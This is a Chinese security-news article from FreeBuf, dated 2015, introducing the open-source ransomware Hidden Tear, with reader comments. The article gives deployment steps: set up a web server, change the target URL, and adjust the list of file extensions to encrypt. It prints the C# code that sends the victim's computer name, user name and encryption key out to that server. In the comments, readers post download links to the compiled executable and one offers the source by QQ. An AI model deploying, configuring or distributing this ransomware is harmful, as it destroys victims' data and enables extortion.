tear

全球首款开源勒索软件 – Hidden Tear

vulture2015-08-19 金币奖励

+5共343848人围观，发现 24 个不明物体工具

FreeBuf曾经报道过众多的勒索软件，而勒索软件的成本也越来越低。今年5月，暗网中曾出现过三步即可傻瓜化制作勒索软件的Tox工具，现在，GitHub上出现了一款开源的勒索软件Hidden Tear。

功能

使用AES算法加密文件
把加密密钥发送到某个服务器
被加密的文件可以通过密钥和解密软件解密
软件会在用户桌面创建一个文本文件，包含勒索信息(如：让受害者如何汇款等信息)

特色

软件仅有12KB

根据2015年8月15日的扫描结果，35款杀毒软件无一款检测出病毒。

演示视频

使用方法

你得要有一个web服务器，并且支持脚本语言，如php，python等。将此行修改成你的URL(最好使用https连接，防止窃听)

string targetURL = "http://www.utkusen.com/hidden-tear/write.php?info=";

脚本会将GET参数写入一个文本文件中，发送的进程则是在SendPassword()函数中

string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);

你还可以修改会被加密的文件的后缀列表，默认列表为:

var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

实际上这款软件有很多地方仍需改进，比如软件所使用的AES加密是对称性的加密，并不适合勒索软件，但正是由于软件是开源的，大家可以不断完善它。

文中提及的部分技术和工具可能带有一定攻击性，仅供安全学习和教学用途，禁止非法使用。

* 参考来源GitHub，vulture翻译，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）

这些评论亮了

坏人回复

我现在还存着源码，需要可以联系我。顺便请求技术支持！QQ：1491533616

)18(亮了
过路人回复

我就想要个Hidden Tear.exe

)7(亮了

发表评论

已有 24 条评论

过路人 2015-08-19回复1楼

我就想要个Hidden Tear.exe

亮了(7)
- llllllllllllllllllllllllllllllllllllllllllllllllll (1级) 2015-08-20回复
  
  @ 过路人 https://anonfiles.com/file/bf83ca835ba284e81952901d6e0b2da9 文件给你！
  
  亮了(1)
- hxy100 (1级) 2015-08-28回复
  
  @ 过路人 https://raw.githubusercontent.com/utkusen/hidden-tear/master/hidden-tear/hidden-tear/bin/Debug/hidden-tear.exe
  
  亮了(1)
Fiend520 (7级) 2015-08-19回复2楼

你想勒索我

亮了(5)
- 向日 (1级) 2015-08-25回复
  
  @ Fiend520 朋友，我点击之后，我文件被Locked了。怎么办！求助
  
  亮了(4)
oinux (2级) 2015-08-19回复3楼

全球首款开源勒索软件…高大上

亮了(2)
songbei6 (1级) 2015-08-19回复4楼

以后一些特殊软件只能在虚拟机上跑了。

亮了(0)
寰者 (7级) 2015-08-19回复5楼

先测试下功能，学习学习

亮了(0)
gamehacker (4级)龙门镖局我最大 2015-08-19回复6楼

服务端的代码呢？

亮了(1)
gamehacker (4级)龙门镖局我最大 2015-08-19回复7楼

哦刚看懂，之接受computerName + "-" + userName + " " + password;这三个字段哈，那倒是很简单啊。

亮了(0)
Angus (5级)AMD®Zen.Team.com.org.cn.net/lo... 2015-08-19回复8楼

win中win….

亮了(0)
Mach 2015-08-19回复9楼

吓到了。。

亮了(0)
Limlu (1级) 2015-08-19回复10楼

别的不说，居然无一杀软查出有毒，这点比较可怕，估计这些天杀软公司们要先加加班了。

亮了(1)
Push丶EAX (4级) 2015-08-19回复11楼

这玩法杀毒软件确实没怎么注意，之前我做过一个DES加密的，360全家+电脑管家全程无视

亮了(1)
snakeyuna (3级) 2015-08-19回复12楼

开源就happy

亮了(0)
Push丶EAX (4级) 2015-08-19回复13楼

= = 这代码写的，userDir赋值的时候没考虑XP，会BOOM的

亮了(0)
向日 (1级) 2015-08-25回复14楼

小白点击之后，文件被加密了，怎么办，怎么破AES加密。泪崩，求助

亮了(2)
- lb867438587 (1级) 2015-08-25回复
  
  @ 向日逗~
  
  亮了(0)
  - 向日 (1级) 2015-08-25回复
    
    @ lb867438587 求解咋办，当时就想测试下。。。
    
    亮了(0)
- jonyer (2级) 2015-11-13回复
  
  @ 向日。。刚刚还笑你来着。。我把我自己也玩死了 (；′⌒`)
  
  亮了(0)
- Sphinx (8级) 2015-11-22回复
  
  @ 向日 https://github.com/utkusen/hidden-tear/tree/master/hidden-tear-decrypter
  
  亮了(0)
jonyer (2级) 2015-11-13回复15楼

(；′⌒`)伤心编译的时候不小心按了F5 结果。。。。。。我日坑爹啊啊啊啊啊啊啊啊啊

亮了(0)
- Sphinx (8级) 2015-11-22回复
  
  @ jonyer https://github.com/utkusen/hidden-tear/tree/master/hidden-tear-decrypter
  
  亮了(0)
坏人 2016-05-24回复16楼

我现在还存着源码，需要可以联系我。顺便请求技术支持！QQ：1491533616

亮了(18)